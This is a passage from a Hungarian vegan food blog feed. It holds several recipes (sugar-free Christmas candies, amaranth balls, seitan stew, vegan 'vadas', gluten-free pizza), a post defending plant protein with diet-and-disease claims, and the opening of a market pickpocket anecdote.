gyümölcszselé.Marcipán-szaloncukor: olyan szaloncukor, amelynek korpusza mandulamarcipán, mogyorómarcipán, diómarcipán, kókuszmarcipán vagy vegyes marcipán. Vajkaramellás szaloncukor: olyan szaloncukor, amelynek korpusza vajkaramella." Kíváncsiságból tovább keresgéltem, hogy mit is ír az egyes cukorfajtákról: "Zselécukorka: A zselécukorkák kocsonyás, könnyen deformálható szerkezetű kolloid rendszerek, amelyeket cukor, glükózszirup, esetleg invertcukorszirup, különféle zselésítőanyagok és jellegkialakító adalékanyagok (ízesítő, színező) felhasználásával öntéssel formáznak és a felületüket védőbevonattal (kristálycukor, csokoládé, bevonómassza stb.) látják el. A megnevezés tartalmazza a ,,zselé vagy a 2,5% gyümölcs szárazanyagot tartalmazó termék esetén a,,gyümölcszselé szavakat, valamint az ízesítésre való utalást. " Akkor most nézzük meg konkrétan egy híres cukorgyár zselés szaloncukorjának összetevőjét: Málna ízű sziruppal töltött, citrom ízű zselé, kakaós étbevonó masszával mártva: cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor(10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák ( citrom, málna), színezék (E120) TI EZT MEG AKARJÁTOK ENNI??? Vagy ezt adjátok a gyerekeiteknek?? Semmi természetes NINCS benne! Tovább nem is szeretnék ezzel foglalkozni, inkább mutatok 3 olyan szaloncukor receptet, amit te magad is elkészíthetsz, és még hozzáadott cukrot SEM tartalmaz. Nem, mintha baj lenne a cukorral, ha az természetes. Nyugodtan használhatsz termelői mézet, kókuszvirágcukrot vagy akár nyers nádcukrot is. NYERS, EGÉSZSÉGES és TÁPLÁLÓ. 1. Narancsos brownie szaloncukor Hát ilyen finomat... nemhiába, a brownie mindig finom. Ez a tészta sok nyers süteményem alapja is, de most csak úgy natúr, szaloncukor készült belőle. Hozzávalók: - 20 dkg áztatott, szárított dió - 10 dkg áztatott, szárított mandula - 20 dkg cukrozatlan, aszalt datolya - 4-5 csepp narancsolaj - 1/2 mokkáskanál vaníliapor - 2 evőkanál cukrozatlan kakaópor - csipet só Elkészítése: A diót és a kis darabokra vágott datolyát tegyük egy késes konyhai gépbe, és morzsásra vágjuk. Ezután adjuk hozzá a kakaóport és a mandulát, és csak pár pulzálással daráljuk össze, hogy a mandula kissé nagyobb darabokba maradjon.Cseppentsük bele a narancsolajat, és gyúrjuk össze. Egyesével formáztam belőle szaloncukor formát.Mártsuk be nyers, narancsos csokiba.2. Fahéjas aszaltszilva zselés szaloncukor Hozzávalók: - 10 dkg aszalt szilva (legjobb a házi-, kén-dioxid- és cukormentes) - 10 dkg cukrozatlan aszalt datolya - 1/2 mokkáskanál ceyloni fahéj - 1/2 mokkáskanál vaníliapor Elkészítése: Először is vágjuk fel az aszalványokat kis darabokra. Éppen csak egy kicsi vizet öntsünk rá, és 1-2 órát hagyjuk puhulni.A felesleges vizet öntsük le róla, és ezután minden mehet a botmixerbe vagy a késes darabolóba. Nem muszáj, hogy teljesen krémes legyen.Ha formázható, akkor készíthetjük is a szaloncukrot. Ha egy kissé lágy lett a massza, akkor terítsük ki úgy 1 cm vastagon és tegyük be az aszalóba, vagy a sütőbe, vagy akár a radiátorra.Ezt szintén mártsuk be nyers csokiba. Én azért tettem hozzá datolyát, mert nekem házi aszalt szilvám van, és egy kissé savanykás. A datolya kellően megédesítette. 3. Zserbó szaloncukor Ennek itt találod a receptjét. A NYERS CSOKI receptjét itt találod. Jó étvágyat!
Kéksajtos amaránt golyók grillezett zöldségekkel
2014. november 27. Zöld Avocado
Csak nem akar egy nap 24 helyett mondjuk 30 órából állni. Pedig én nagyon örülnék neki! :-D Főleg mostanában! ;-) Kéksajtos amaránt golyók grillezett zöldségekkel Egy újabb roppant egyszerű receptet hoztam nektek. A neve alapján különlegesnek tűnik, de egyáltalán nem az. Sokszor a gasztronómia már csak ilyen. Egy hangzatos név mögött egyszerű étel áll. :-) Ezt az ízletes és szemet gyönyörködtető tálat is akárki elkészítheti, különleges konyhai jártasság nélkül. Bár a köret nem hétköznapi hozzávalókat tartalmaz, nem kell tőle megijedni. Az amaránt és a puffasztott amaránt is könnyedén beszerezhető Magyarországon is. Számos webáruház létezik, melyekről jó áron házhozszállítással hozzá lehet jutni különböző gabonákhoz, melyek táplálkozási szempontból sokkal értékesebbek, mint a hagyományos rizs, melyet előszeretettel fogyasztunk. Ajánlom, hogy próbáljatok ki újabb és újabb gabonákat, és ami megtetszik, abból legyen mindig egy zacskóval a rizs mellett a konyha szekrényben. ;-) Hogy mit lehet a rizs helyett a tányérunkra tenni köretként? Pl.: Amarántot, kölest, hajdinát, kuszkuszt, bulgurt, vagy quinoa-t stb. A gabonákról a későbbiekben még majd jelentkezem egy külön bejegyzéssel. Nem is nagyon ragozom tovább. Vágjunk bele! ;-) kéksajtos amaránt golyók grillezett zöldségekkel HOZZÁVALÓK: (kb.22 db golyóhoz) - 1 bögre amaránt - 2 bögre víz - 3 gerezd fokhagyma - 1 bögre puffasztott amaránt (vagy mandula liszt helyette) - 1/2 bögre mandula liszt - 1 ek útifűmaghéj (Psylium Husk) - 100 g kék sajt / márvány sajt - 1 bögre dió - Himalája só - Kókuszzsír - - grillezni kívánt zöldségek (pl.: padlizsán, pritamin paprika, cukkini) ELKÉSZÍTÉS: 1 bögre amaránt 2 bögre vízben fedő alatt kb. 30 perc alatt készre főzve. A vízbe préseljünk 3 gerezd fokhagymát. Miután elfőtte a levet, és már sűrű kása jellegű, de még nem szemcsés, keverjük bele a 100 g reszelt kéksajtot. Hagyjuk az egészet kihűlni. Hűlés után tegyünk hozzá 1 bögre puffasztott amarántot, 1/2 bögre mandula lisztet, 1 ek útifűmaghéjat és egy kevés sót. Keverjük össze, és hagyjuk egy fél órát dermedni. Letelt a fél óra. Formázzunk a kezünkkel amaránt gombócokat (kb.2-3 cm átmérőjű), majd forgassuk őket frissen darált dióba. (1 bögre dió ledarálva). Miután végeztünk az összes golyóval, tegyük őket a hűtőbe 1-2 órára, hogy még keményebb golyókat kapjunk. kéksajtos amaránt golyók Akár már délelőtt is elkészíthetjük az amaránt golyókat, hogy este a vacsi előtt csak elő kelljen kapni őket a hűtőből. (Érdemes korábban kivenni, hogy inkább szoba hőmérsékletű legyen, mint hűtő hideg.) Közben a grillezni kívánt zöldségeket előkészíthetjük. Én ebben az esetben színes vastag húsú pritamin paprikát, cukkinit és padlizsánt használtam. A zöldségeket tetszés szerinti méretben feldaraboltam, és megmostam. A tűzhelyre tettem a ,,grill serpenyőt, és kókuszzsírral kikentem. A cukkini karikáknak nem kell sok idő, mert akkor finom, ha még roppanós. Éppen, hogy megcsíkozzuk a külsejét mindkét oldalon, és kész is. A paprika egy kicsit tovább tart, és folyamatos kókuszzsír utánpótlást igényel, hogy ne égjen oda, de azért süljön is. A padlizsánt érdemes a végére hagyni, mert az alá egy kis víz sem árt. Miután a serpenyőben lesült a paprika, és a cukkini, ha ráöntünk 1 dl vizet, akkor a víz feloldja a lesült zöldség darabkákat a serpenyőről, amitől még finomabb íze lesz a padlizsánnak. A víz azért kell, hogy egy kicsit párolódjon a padlizsán, amit kb. 1 cm vastag darabokra vágtam fel. Miután elfő a lé a padlizsán alól, hagyjuk még egy kicsit grilleződni. Közben forgassuk is meg őket, hogy mindkét oldal piruljon. Ez tart a legtovább, de megéri. grillezett zöldségek Természetesen más zöldségeket is felhasználhatunk, és ha nincs otthon grillezős serpenyő, akkor használjuk a hagyományos tojás sütő serpenyőt, és süssük meg a zöldségeket abban. Vagy akár sütőben sütő papíron is elkészíthetjük őket, meglocsolva a zöldségeket egy kis kókusz zsírral. Ugye, hogy nem is volt olyan bonyolult? ;-) Jó étvágyat hozzá! kéksajtos amaránt golyók grillezett zöldségekkel Megjegyzés1: Szerintem mehetne a golyókba több kéksajt, mert én nagyon szeretem az ízét. :-) Balázs szerint pedig több fokhagyma, mert ő meg azt szereti. ;-) Mindenki döntse el, melyik táborba tartozik?! Megjegyzés2: ha nagyon nem megy a különleges gabona beszerzése, természetesen elkészíthetjük rizzsel is a gombócokat. De azért legalább jó minőségű barna rizst használjunk, ne sima fehéret. ;-)
Chilis almás-tökös köret pirított dióval
2014. november 25. Éltető ételek
Itt van az ősz, persze mindjárt a tél is. Ilyenkor két igazi magyar alapanyag a sütőtök és az alma került a tányéromra. Persze nemcsak így simán, hanem csípős-savanyú ízvilágban, megbolondítva egy kis brokkolival (már csak a színe miatt is). Hozzávalók: ( 2 adag) - 2 szép nagy gála alma - 2 csésze kockára vágott sütőtök - 3-4 gerezd fokhagyma - 1/2 póréhagyma - 1 evőkanál kókuszolaj - kis marék áztatott-szárított-pirított dió - 2 brokkoli rózsa - himalája só, bors, chili - kevés citromlé Elkészítése: - A póréhagymát megtisztítom és felszeletelem. A karikák szépen különválnak, és ezt a serpenyőbe teszem 1 evőkanál kókuszolaj kíséretében. - Hozzádobom a felszeletelt fokhagymát és pirítom egy picit. - Ezután jön az alma és a sütőtök. - Lefedve sütöm (szükség esetén egy pici víz mehet alá). Fűszerezzük. Ne nagyon keverjük, hogy a sütőtök egyben maradjon. - Kb. 15 perc elteltével hozzáadom a kis darabokra szedett brokkolit, Párolódik még egy kicsit, majd meglocsolom kevéske citromlével is. - Tálaláskor szórok rá pirított diót.Amennyiben több személyre készül, akkor a sütőt javaslom. Karácsonykor finom köret lehet.
Vörösboros szejtánpörkölt nokedlivel
2014. november 21. Vegán muflon
A pörköltet állítólag Kárpát-medencei bojlerszerelők találták ki azért, hogy a munkából hazaérve legyen mivel leenni az atlétatrikójukat. Azonban kezdeményezésük olyannyira nagy sikert aratott, hogy később a hortobágyi gulyások, majd minden autóstáskával és Besenyő-sapkával rendelkező férfiember kedvenc tápláléka lett. Mivel sutyiban még a keményvonalas vegánokban is ott rejtőzik a szocreál Disneyland báránybőr sisakos Miki Egere, következzék e tradicionális magyar táplálék veganizált változata. Hozzávalók: A szejtánpörlkölthöz: Egy életellenes magyarnóta 150 gramm szejtánpor 1 db vöröshagyma 2 kiskanál Vegeta, vagy Vegeta-fóbiásoknak ultrabio ételízesítő 1 evőkanál pirospaprika 1 kiskanál édes paprikakrém 1 kiskanál őrölt kömény 1/2 deci vörösbor ízlés szerint csípős fűszerpaprika só, bors A nokedlihez: 25 dkg liszt 2 deci szójatej 3 evőkanál margarin (ne féljünk tőle, de tényleg!) só A fent említett magyarnótát a hangulat megalapozása érdekében elindítjuk, majd pánikszerűen kikapcsoljuk. A szejtánporból szejtánt főzünk az itt leírt módon (lásd a "szejtánhoz hozzáadjuk..." kezdetű részt). A megfőtt, felszeletelt szejtánt egy serpenyőben, kevés olajon sóval ízlésesen megpirítjuk. Közben egy másik edényben alágyújtunk egy kevés olajnak, beleszórjuk a felkockázott hagymát, és hagyjuk üvegesedni. Majd hozzáadjuk a pirospaprikát, a paprikakrémet, az őrölt köményt, az ételízesítőt, majd a szejtánt és összekeverjük. Ezután naivan hozzálöttyintjük a vörösbort. Pár percig hagyjuk összeállni, majd levesszük a tűzről. Egy másik edényben összekeverjük a lisztet és a szójatejet a felolvasztott margarinnal és a sóval, majd komor arccal bugyborékoló forró vízbe szaggatjuk. Aztán szervírozzuk:
Fehérjebevitel - kiegészítés
2014. november 16. Vegan Spirit
Mivel nagyon sok komment érkezett a fehérjebevitelről szóló cikkhez (a címlapra kerülésnek köszönhetően), és ezekre nincs időnk egyenként válaszolni, ezért GS írt egy rövid választ a legfontosabbakra. További jó kommentelést nektek! Ha lesz energiám és időm, még válaszolok majd pár hozzászólásra később. Íme GS válasza: "Látom, hogy az előző cikk, nagyon erős védekező mechanizmust váltott ki a legtöbb emberből, pedig nem a támadás volt a cél vele, csupán információmegosztás, egy olyan régi, tévesen berögzült témáról, mely esetlegesen megakadályozza, a veganizmus iránt már bizonyos szinten nyitott embereket abban, hogy kipróbálják a vegán életmódot , hiszen félnek a nem teljes értékű, ,,komplettálásra szoruló növényi fehérjéktől, így jóval bonyolultabbnak beállítva, egy egyébként egészségesebb, környezetvédőbb és legfontosabb érvként, kegyesebb életmódot a hozzánk hasonlóan érző lényekkel, az állatokkal szemben is. A növényi fehérje másodrangúsága még a 20 század elejéről eredeztethető, ahol kísérleti patkányok, jobban nőttek az állati eredetű fehérjén, mint a növényin; azonban, két fontos dolog kimaradt: 1) a patkányoknak 10 létfontosságú aminosavra van szükségük, az embereknek 8-ra vagy 9-re (hisztidint is beleszámolva vagy sem) 2) a patkányok rövid idő (4 és fél nap) leforgása alatt megkétszerezik a méretüket, melyhez 50%-os fehérjetartalmú anyatej társul, míg egy csecsemő lassan, 6 hónap leforgása alatt duplázza meg a súlyát, melyhez csupán 5-6%-os fehérjetartalmú anyatej társul Ezekből kifolyólag, természetes, hogy a patkányoknál nagy jelentősége volt a fehérjének, amit kaptak. Ennek ellenére, az itt találtakat az emberekre is rávetítették, és a növényi táplálékokat hiányosnak könyvelték el, mely gondos ,,komplettálásra szorul, amit igazán népszerűvé, Frances Moore Lappé: Diet for a Small Planet című, 1971-es könyve tett; annak ellenére, hogy ő maga növényi táplálkozást javasolt, a húsfogyasztás már akkor is ismert, környezetkárosító volta miatt; a felvetett ,,komplettálást azonban 1981-re, a könyve tíz éves jubileumi kiadására visszavonta, és beismerte, hogy könnyebb fehérjéhez jutni, mint gondolta, és sajnálatosan azt a tévképzetet adta az embereknek, hogy növényi táplálkozást folytatni nehéz, a ,,fehérjekomplettálás miatt, ezáltal legalább annyi embert eltaszítva attól (a mai napig is), mint amennyit bevonzva. Ezen próbálnak változtatni, hiteles, növényi (vegán) táplálkozás mellett a szavazatukat letevő orvosok és dietetikusok, akik már számtalanszor felemelték a hangjukat a témában. Így az, aki tud angolul, adjon egy esélyt az előző cikk végén említett három hivatkozásnak (1)(2)(3), hogy teljesen képbe kerülhessen a témáról, és ne egy rég berögzült téveszme legyen az, ami visszatartja az embereket, egy számukra és környezetünk számára is jobb életmódtól. A cikkben szereplő következő mondatot kifejteném bővebben: ,,ha elég táplálékot veszünk magunkhoz (magyarul elég kalóriát fogyasztunk és nem éheztetjük magunkat), akkor akár egyetlen táplálékból is - néhány ritka kivételtől eltekintve - fedezhetnénk a létfontosságú aminosav szükségletünket. Az ,,elegendő kalória természetesen nem több, mint ami az ember létfenntartásához szükséges, mely nagy átlagban 2000-3000 kcal közötti mennyiség (komolyabb testmozgás végzése nélkül); ennél többről nincs szó, így nem kell senkinek túlennie magát, csupán eleget ennie, miközben egyúttal a tápanyagszükségletét is ellátja így. A ,,néhány ritka kivétel nem lett kifejtve, tekintve, hogy kicsi az esélye annak, hogy emberek kizárólagosan kb. 3% vagy az alatti fehérjetartalmú növényi táplálékokon akarnának élni hosszú távon, legfőképpen, hogy átlagban még a gyümölcsök is 6% fehérjetartalmúak, azonban kivételek mindig akadnak. Ezek azok a táplálékok (alma, körte, bizonyos aszalt gyümölcsök, manióka stb.), amelyekben ugyan megtalálható az összes létfontosságú aminosav, azonban alacsony fehérjetartalmuk miatt túl sok kalóriát kellene elfogyasztani belőlük azok fedezéséhez; így ide, egy hozzászóló kifejezése nagyon találó, ezeknél ,,relatív hiány áll fenn, és nem is javasolható természetesen, hogy kizárólagosan ezekre építsen az ember egy étrendet, mert nem csupán fehérjében, de egyéb létfontosságú tápanyagokban is rendkívül szegények. Azonban ez a relatív aminosav hiány a növényi táplálékok legnagyobb részében (99%-ában) nincs jelen (így azok számítanak ritka kivételnek, amiknél jelen van), és az a feltételezett eset is felvázolható, hogy csupán egyetlen, nem a kivételek közé tartozó, relatív aminosav hiánnyal nem rendelkező egyszerű növényi táplálékkal is képesek lennénk fedezni a létfontosságú aminosav szükségletünket, az előzőekben említett 2000-3000 kcal bevitelével. Természetesen nem is ajánlott senkinek sem csak egyetlen táplálékra korlátoznia az étrendjét, csupán megnyugtatásul közlendő, hogy ha valaki egy nap egyedül például csak babot vagy burgonyát eszik, akkor nem kell a nap folyamán azt komplettálni valami más növényi fehérjével, mert az magában is teljes értékű növényi fehérje volt; és ennek megvizsgálására tökéletesen alkalmasak az étrendi naplók, melyek nem-vegán forrású adatbázisokra (pl. USDA, NCCDB) épülnek. A valós fehérjeminimumot pedig nem csupán a cikkben említett Dr. William Rose állapította meg rendkívül alacsony értékben (20 grammban), hanem számos kutató őt követően, akár saját magán is kísérletezve, napi 30 grammnál kevesebb fehérjével, mellyel képesek voltak pozitív nitrogénegyensúly fenntartására. Ennek ellenére, a hivatalos ajánlásokban szereplő 0,66g-0,83g fehérje testtömeg kilogrammonként, egy bárki számára könnyedén elérhető és javasolható mennyiség. A gyümölcstáplálkozásról pedig ezek után fehérjeszempontból csak annyit, hogyha az ember nem a relatív hiányos aminosavprofilú táplálékokra építi az étrendjét, akkor, ahogyan egy 1971-es, dél-afrikai kutatásból kiderül, még akár növekedhet is a szervezet összfehérje és albumin szintje, egy napi 32-55 gramm közötti fehérjetartalmú gyümölcstáplálkozáson (1)(2). Végezetül válaszként, arra a hozzászólásra, miszerint egy szénhidrátdús (és zsírszegény), teljes értékű, növényi táplálkozás nem szolgálná az emberek egészségét, hogy ilyen táplálkozással voltak képesek hiteles orvosok, 1) a 2-es típusú cukorbetegség megelőzésére, javítására és visszafordítására, és az 1-es típusú rendkívül jó hatásfokkal történő kezelésére; egy előadás a témáról, Dr. Neal Barnardtól 2) a szív- és érrendszeri megbetegedések megelőzésére, javítására és visszafordítására; egy előadás, a témában Dr. Dean Ornish-sal egyetemben szakértő, Dr. Caldwell Esselstyntől. GS " J. K. Valentine
Díjnyertes Vadas "Vegan Spirit módra"
2014. november 10. Vegan Spirit
Az utóbbi időben egyre inkább törekszem arra, hogy nyers ételeket fogyasszak. Ennek ellenére úgy döntöttem, hogy egy főtt ételt viszek a második vegán ételkóstolóra, mégpedig egy vegán vadast zsemlegombóccal. A fő ok, ami miatt a főtt étel mellett döntöttem az volt, hogy sok nem vegán ember szokott jelen lenni ezeken az eseményeken. Nyilván, ha odaállítok egy kiló banánnal, mint a nyers ételek legegyszerűbb képviselője, hát nem sokukat fogom megnyerni a veganizmus számára. Ezért gondoltam, hogy egy ízletes, magyaros ételt viszek. Sikere is lett, hiszen annak ellenére, hogy egy órával később érkeztem, mint kellett volna, így is sikerült megnyerni a "Második vegán ételkóstoló kedvenc konyhatündére!" címet! :) Hozzávalók: - 1kg szejtán - recept itt A páchoz: - 1 dl fehérborecet - 3 ek mustár - 3 ek vad fűszerkeverék - adalékanyag mentes! (fokhagyma, vöröshagyma, fekete bors, koriander, mustármag, kakukkfű, sárgarépa, szegfűbors, babérlevél, borókabogyó, rozmaring) - egy mokkáskanál szezámolaj Zsemlegombóchoz: - 400g rozskenyér - 350g durum liszt - 7dl natúr szójatej - 2 csomó petrezselyem - só - bors Vadas mártáshoz: - 2 fehérrépa - 1kg sárgarépa - 1 közepes zeller gumó - 1 vöröshagyma - 5 babérlevél - 250g lágy ízű mustár (erősebből kevesebb kell) - 0,5l tisztított víz - 2 csipet só Tálaláshoz: - szójajoghurt - apróra vágott petrezselyem Elkészítés: Az előre elkészített szejtánt (recept itt) ceruza vastagságú csíkokra vágjuk. A pác hozzávalóit összekeverjük, majd beleforgatjuk a szejtán csíkokat, és legalább fél órán át állni hagyjuk. Még jobb, ha egy egész estén át pácolódik. Amíg pihen a szejtán, addig pucoljuk meg és karikázzuk fel a mártáshoz való zöldésgeket, valamint aprítsuk fel a hagymát. A hagymát és a babérleveleket kevés olajon pirítsuk meg, majd adjuk hozzá a feldarabolt zöldségeket a sót, öntsük fel a vízzel és kezdjük el főzni. A szikkadt kenyeret vágjuk fel kb 1x1cm-es kockákra, és egy edényben lassan pirítsuk meg a kenyérkockákat, óvatosan, nehogy elszenesedjen! Közben, ha a zöldségek nagyjából megpuhultak, vegyük le a tűzről, halásszuk ki (dobjuk ki) a babérleveleket, és hagyjuk hűlni. Ezután a szójatejet melegítsük meg, de ne forraljuk fel! Elég, ha a kézmelegtől picit melegebbre hevítjük, majd a meleg tejből és a lisztből és ha szükséges, egy kis vízből keverjünk egy sűrű ragadós (a nyers kenyértészta és a palacsinta tészta közötti állagú) dolgot, sózzuk, borsozzuk, a petrezselymet pedig apróra vágva adjuk hozzá és keverjük össze a pirított kenyérkockával. Tegyük félre 20-30 percre pihenni, hogy a száraz kenyérkockák egy kis nedvességet szívjanak magukba. Közben tegyünk fel egy edényben enyhén sós vizet forralni, amiben majd kifőzzük a zsemlegombócokat. Amíg a víz felforr, addig a langyosra hűlt zöldségeket a főzőlével és a mustárral együtt tegyük turmixgépbe és turmixoljuk össze. Fokozatosan adagoljunk hozzá még annyi tisztított vizet, amivel a megfelelő állagot elérjük. Én szeretem ha egy nagyon sűrű főzelékhez hasonló az állaga. Ha kész vagyunk, akkor vegyük elő a pácolt szejtánt, és úgy ahogy van, borítsuk bele egy nagy tapadásmentes edénybe, és hirtelen pirítsuk kérgesre a csíkokat. Ezután két evőkanál segítségével formázzuk ki a zsemlegombócokat, és dobjuk a lobogó vízbe. 2 perc alatt megfő, de ha sokáig hagyjuk bent a vízben, akkor könnyen szétázik! A frissen kifőzőtt gombócokat helyezzük egy tányérra, és szedjük mellé a szejtán csíkokat, locsoljuk meg bőven a vadas mártással. Én a szejtáncsíkokat belekevertem a mártásba, mert így jobban szeretem, mint ha külön van, csak pár csíkot halmoztam a tetejére, hogy látszon, plusz még szójajoghurtot is tettem rá. Boldogsággal a szívetekben fogyasszátok! :) J. K. Valentine
Gluténmentes kívánság pizza házilag
2014. november 7. Zöld Avocado
Nagyon szeretjük a jó pizzát! :-) Ki ne szeretné a jó pizzát? De hol lehet olyat manapság kapni??? Hiába találunk minden sarkon egy helyet, ahol készítik ezt a világhíres olasz finomságot, egyre silányabb minőségben teszik elénk ezeket a pizzákat. Az üzlet tulajdonosok spórolás céljából, egyre ritkább feltétet, vékonyabb paradicsomszósz réteget, és kevesebb sajtot kínálnak a "Város legjobb Pizzája", vagy "Igazi olasz pizza" címszó alatt. gluténmentes kívánság pizza házilag Olyan nehéz olyan pizzázót találni, ... ... ahol van tartása a tésztának ... olyan, beleharapok és "hmm" íze van a szósznak, ... gazdagon dísziti feltét, ...és a sajttömeg a tetején, olyan reklámokból jól ismert, de a valóságban ritkán megtapasztalt nyúlós és illatos. Hát ezt az élményt, sajnos egyre nehezebb átélni. :-( A Magyarországon élők előnyben vannak, mert azért egy-két házhozszállítós cég, még mindig el tudja kényeztetni az ízlelőbimbóinkat. Sajnos azonban a külföldön élők alátámaszthatják, hogy gasztronómia kérdéskörében, "nyugat" tanulhatna tőlünk. ;-) Hoztam nektek egy gyors megoldást arra, hogyan készíthettek otthon, pillanatok alatt, tartalmas, ízletes, illatos, nyúlós sajtos, mennyei pizzát, ami még egészséges és laktató is! :-) Fogadjátok és fogyasszátok! házi pizza hozzávalók egy része... HOZZÁVALÓK: a tésztához (kb. 1 nagyobb étvágyú embernek): 2 tojás (vagy őrölt lenmag vízbe áztatva) 100g darált mandula 50 g rizs liszt vagy kukorica liszt (ha nem fontos, hogy glutén mentes legyen, akkor használj inkább teljeskiőrlésű tönkölyt) 3 ek extra szűz olíva olaj vagy répce olaj 1/2 tk szódabikarbóna 1 tk Himalája só késhegynyi fehér bors 1 maroknyi friss petrezselyem (1 ek útifűmaghéj) (1 ek őrölt lenmag) (1 marék napraforgó mag, vagy tökmag, vagy vegyesen mindkettő) (opcionálisan lila hagyma, vagy fokhagyma a tésztába sütve) A zárójelben található hozzávalók nem kötelező tartozékok, de érdemes feldobni a tésztát is néhány egészséges extrával ;-) a feltéthez: - házi paradicsom szósz - tetszés szerint zöldségek: előre párolt brokkoli rózsák, kukorica, lila hagyma, fokhagyma, pritamin paprika, snidling, oliva bogyó, gomba stb. - 50g kemény, reszelt sajt (ha laktózmentesre szeretnénk, használjunk növényi sajtot) - (sörélesztő, miután kivettük a készre sült pizzát. A lényeg, hogy ne legyen hőkezelve a sörélesztő.) a házi paradicsomszószhoz: 2-3 nagyobb érett paradicsom 1/2 tk Himalája sócsipet fehér bors1 ek mustár 1/2 lila hagyma 1/4 avokádó (el is lehet hagyni)1 ek útifűmaghéj (nem elhagyható, mert ettől lesz krémes, és nem folyós állagú)friss bazsalikomaki szereti csípősen, az tehet bele egy kis őrölt chilit, vagy Cayenne paprikát gluténmentes kívánság pizza házilag ELKÉSZÍTÉS: Hosszan és részletesen fogom leírni, de ne ijesszen meg senkit a terjedelem! Egy roppant egyszerű ételről van szó, mely elkészítése során kiélhetjük kreativitásunkat is, és rugalmasan alakíthatjuk a receptet a saját szánk íze szerint. ;-) A tésztához valókat összekeverjük, cipót formálunk, majd kb. 30 percre hűtőbe tesszük... házi paradicsomszósz Közben elkészítjük a házi paradicsomszószt. A paradicsomokat felkockázzuk, és vízzel felengedve (épp ellepje) fedő alatt főzni kezdjük. Adunk hozzá fűszereket: só, bors, 1 ek mustár, ízlés szerint fokhagyma. Elővesszük a turmix gépünk krém készítő alkatrészét, és bele darabolunk (nagyobb darabok) egy fél lila hagymát. Engedünk rá egy kevés vizet (2-3 ek.), és krémessé turmixoljuk a lila hagymát. Hozzáadunk egy negyed avokádót, és 1 ek útifűmaghéjat. Közben a szétfőtt paradicsomot félre tesszük hűlni (ha hideg van oda kint, tegyük egy kicsit a szabadba, vagy ablakpárkányra, hogy gyorsabban kihűljön). A kihűlt, szétfőtt paradicsom pürét hozzáadjuk a lilahagymás, avokádós, útifűmaghéjas alaphoz, és az egészet szósz állagúvá turmixoljuk. Miután az egész egynemű és krémes lett, vagdosunk bele egy pár levél friss bazsalikomot, és félre tesszük, hogy az útifűmaghéj kifejthesse kocsonyásító hatását. nyújtsunk két sütőpapír között A hűtőből előkerülhet a tészta buci. Előveszünk két db sütőpapírt, és betesszük közé a nyers tésztát. Sodrófával kinyújtjuk a tésztát kb.fél cm vastagságúra (elég ennyi, mert a tészta a hő és a szódabikarbóna hatására meg fog hízni). A forma nem számít, hisz nem eladásra szánjuk. ;-) Ha kedvünk van, lehet a pizza kerek, vagy ovális, de akár négyzet alakú is. A készre nyújtott tésztáról lehúzzuk a felső sütőpapírt. Az alsó papírt és a tésztát üresen bedobjuk az előmelegített sütőbe 200 fokon kb.8-10 perce. Míg a pizzánk tésztája elősül, előkészíthetjük a kívánt feltéteket. Kinek mihez van kedve?! Én legtöbbször lilahagymát vagy fokhagymát, előpárolt brokkolit, paradicsomot és kukoricát teszek rá. Na meg persze jóóóó sok reszelt sajtot. ;-) Amikor már kérge sül a nyers tésztánknak a sütőben, kivesszük, és elkészítjük a végső formáját. Megkenjük a házi paradicsomszósszal, és megpakoljuk jó magasan a feltétekkel, és a sok sok sajttal. Ez nem egy bolti mirelit pizza, itt ne sajnáljuk a feltéteket! ;-) Olyan magas legyen a pizzánk, hogy még éppen beférjen majd egy-egy falat a szánkba. :-D Miután elkészítettük a ,,pizza várat, visszadobjuk a sütőbe, és újabb 10 perc alatt 200 fokon készre sütjük a házi pizzát. Aki szereti, az utolsó pár percben feltekerheti a sütő grillező gombját, és egy kicsit megpiríthatja a sajt tömeget a pizza tetején. Megjegyzés: Míg a pizzánk a sütőben szolizik, pont elég időnk van, hogy elmosogassunk, vagy bepakoljunk a mosogatógépbe, hogy aztán kényelmesen, és nyugodtan átadhassuk magunkat a mennyei, gyomor barát, és ízletes házi pizzánknak. ;-) Kérsz egy falatot? ;-)
Kelbimbós sült puliszka
A polenta? Igen, mostanában elég divatos étel. De mi is az pontosan, van neki magyar neve? De még mennyire! Úgy hívják, puliszka. Amikor én ezt először meghallottam, nagyon meglepődtem. A puliszkáról nem sokat tudtam addig, csak annyit, hogy nekünk bizony nagyon jó, mert nem kell olyat ennünk, hiszen a puliszka nagyon rossz, a szegények eledele, akik viszont azt esznek minden nap. Drága jó édesapám gyerekkorában valószínűleg többet kapott belőle, mint ő azt szerette volna. Ehhez képest a puliszka szerintem nagyon finom, kitűnő egytálétel, extra különleges köret, gyorsan megvan, és roppant egyszerű elkészíteni. És emellett még olcsó is. Az ember azt ad hozzá, amit szeret, és én most a méltán szuperélelmiszerként számon tartott kelbimbót szemeltem ki erre a célra. Hozzávalók 6 adaghoz: [...] Bővebben!
1 vegán, 1 bevásárlás, 1 bűnöző. Elmesélem hogy illenek össze.
2014. október 23. Vegan Spirit
Mi a közös egy piaci bevásárlásban, a VeganSpiritben és egy körözött bűnözőben? Kezdem az elején... ...Tegnap elindultam a Lehel téri vásárcsarnokba, hogy vegyek pár doboz aszalatlan datolyát, és egyéb növényeket a piacon, mivel 80% körül nyers vegán ételeket fogyasztok. Persze a maradék 20% is vegán, csak nem nyers. Sietnem kellett, mert este hivatalos voltam egy kedves ismerősöm által szervezet eseményre, és még a tervezett ételt is el kellett addig készítenem, amit vinni szándékoztam az összejövetelre. Tehát a Váci utca felőli oldal közepénél mentem be a csarnokba, és elindultam befelé, a magvas árusok irányába, hogy a datolyát beszerezzem. Egyszer csak arra figyeltem fel, hogy előttem 3 méterrel egy idős hölgy, kiabál a mellette álló párjának, hogy "Vigyázz! A táskában turkál! Ki akar venni belőle valamit!" Közben melléjük értem, és láttam, amint mögöttük áll, egy kb 175 cm magas, jól kigyúrt, flegma férfi, aki meglepődött arckifejezéssel válaszolt. "Menny mán arrébb, hagy mennyek el!" Az erősen bunkó megjegyzés után feltűnt, hogy páran ugyan odakapták a fejüket a néni felkiáltására, de igazából semmi sem történt. A férfi elsétált a hölgy mellett, és a szemét forgatva mélyen lehajtotta a fejét, és elkanyarodott balra, majd ismét balra. A lábaim ösztönösen vittek a férfi után, és ekkor már tudatosult bennem, hogy követni szándékozom őt, mert ha zsebes, akkor bizony nagyon nem vegán elvek szerint cselekszik. Annyi a különbség, hogy mivel ő embereket zsákmányol ki, ezért ezt a saját bőrükön tapasztalva felháborodnak. 